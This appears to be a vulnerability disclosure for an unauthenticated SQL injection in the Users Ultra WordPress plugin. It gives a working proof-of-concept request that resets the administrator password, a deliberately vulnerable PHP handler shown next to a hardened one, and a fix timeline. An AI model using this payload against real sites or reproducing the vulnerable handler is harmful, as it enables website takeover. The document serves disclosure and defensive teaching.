Users Ultra [SQL injection]
The WordPress plugin Users Ultra suffers from an unauthenticated SQL injection vulnerability.
Description
The AJAX handler registered on the wp_ajax_nopriv_rating_vote hook is reachable by unauthenticated visitors through wp-admin/admin-ajax.php (action=rating_vote). The POST parameters data_target and data_vote are placed into the plugin's query without sanitisation or escaping, so an attacker can execute arbitrary SQL statements against the WordPress database.
Proof of Concept
In the following PoC we change the administrator's password to '1', so a malicious user can then log in as the administrator and take full control of the website.
- Send a POST request to
http://my.vulnerable.website.com/wp-admin/admin-ajax.php
with the body:
action=rating_vote&data_id=1&data_target=user_id IN (1); UPDATE wp_users set user_pass=MD5(1) where ID &data_vote=1
The plugin appears to build its WHERE clause from data_target followed by data_vote, so with data_vote=1 the injected tail ends as "where ID =1" and the stacked UPDATE sets the administrator's password hash to MD5('1'). WordPress still accepts a legacy 32-character MD5 hash in user_pass and silently rehashes it on the next successful login, which is why the plain password 1 works.
- Log in with the administrator's user name and the password 1.
Note that we assume the table prefix is wp_ and the administrator's user ID is 1, a very common scenario.
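The following PHP sketch is an added illustration of the bug class described above and of the PoC; it is not the Users Ultra plugin's own code. It assumes a hypothetical ratings table (wp_uultra_ratings with columns user_id, post_id and votes) and a handler that concatenates data_target and data_vote into the WHERE clause, which is what the PoC payload implies. The vulnerable handler is shown beside a hardened one that allow-lists the column name, binds values with $wpdb->prepare(), requires a nonce, and is only registered for logged-in users.

```php
<?php
/*
 * Added example, not the plugin's code. Table and column names
 * (wp_uultra_ratings, user_id, post_id, votes) are assumptions;
 * the advisory does not show the plugin's real schema.
 */

// VULNERABLE pattern: attacker-controlled column name and value are
// concatenated straight into the query. The nopriv hook makes the
// handler reachable without logging in.
function uu_rating_vote_vulnerable() {
    global $wpdb;
    $target = $_POST['data_target']; // PoC: "user_id IN (1); UPDATE wp_users set user_pass=MD5(1) where ID "
    $vote   = $_POST['data_vote'];   // PoC: "1"
    // With the PoC input the statement becomes:
    //   UPDATE wp_uultra_ratings SET votes = votes + 1
    //   WHERE user_id IN (1); UPDATE wp_users set user_pass=MD5(1) where ID  = 1
    $wpdb->query( "UPDATE {$wpdb->prefix}uultra_ratings SET votes = votes + 1 WHERE {$target} = {$vote}" );
    wp_send_json_success();
}
add_action( 'wp_ajax_nopriv_rating_vote', 'uu_rating_vote_vulnerable' );

// HARDENED version: the column comes from a fixed allow-list (never from
// the request), the value is bound with $wpdb->prepare(), the request
// must carry a nonce, and only the logged-in hook is registered so the
// endpoint is not reachable anonymously.
function uu_rating_vote_hardened() {
    global $wpdb;
    check_ajax_referer( 'uu_rating_vote', 'nonce' );

    $allowed_targets = array( 'user_id', 'post_id' );
    $target = isset( $_POST['data_target'] ) ? sanitize_key( $_POST['data_target'] ) : '';
    if ( ! in_array( $target, $allowed_targets, true ) ) {
        wp_send_json_error( 'invalid target', 400 );
    }

    $vote = isset( $_POST['data_vote'] ) ? absint( $_POST['data_vote'] ) : 0;
    if ( 0 === $vote ) {
        wp_send_json_error( 'invalid vote target id', 400 );
    }

    $table = $wpdb->prefix . 'uultra_ratings';
    // $target may be interpolated only because it was taken from the
    // allow-list above; the attacker-supplied value is bound as %d.
    $sql = $wpdb->prepare( "UPDATE {$table} SET votes = votes + 1 WHERE {$target} = %d", $vote );
    $wpdb->query( $sql );
    wp_send_json_success();
}
add_action( 'wp_ajax_rating_vote', 'uu_rating_vote_hardened' );
```

The allow-list is the essential part: $wpdb->prepare() can bind values but not identifiers, so a column name chosen by the client can never be made safe by escaping alone. Dropping the wp_ajax_nopriv_ registration is a separate decision; if anonymous voting is a feature, keep the nopriv hook but still apply the allow-list and parameter binding.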
INFO
- Date: 29 May 2015
- Author: Pan Vag
- Vendor: usersultra.com
- Plugin page: wordpress.org
- Affected version: 1.5.15
- Tested on: WordPress 4.2.2
- CVE: CVE-2015-4109
TIMELINE
- 2015-05-29: Discovered
- 2015-05-30: Vendor notified via contact form
- 2015-06-01: Vendor notified via support forums at wordpress.org
- 2015-06-02: Vendor responded
- 2015-06-04: Fix released in version 1.5.16